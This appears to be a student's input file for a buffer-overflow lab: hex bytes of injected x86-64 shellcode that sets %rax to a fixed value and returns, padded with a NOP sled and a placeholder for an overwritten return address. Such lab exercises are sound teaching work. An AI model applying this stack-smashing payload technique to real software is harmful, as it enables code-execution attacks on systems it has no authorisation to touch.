55                   	/* push   %rbp */ 
54                   	/* push   %rsp */ 
48 c7 c0 ed 24 25 62 	/* mov    $0x622524ed,%rax */ 
5d                   	/* pop    %rbp */ 
5c                   	/* pop    %rsp */ 
c3                   	/* retq */ 
90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90
 /* <address> */  
  /* <hard code return location bc it is not in stack> */ 

  /* have enough nops in order to accomodate for the difference in 240 - just need 1 address*/ 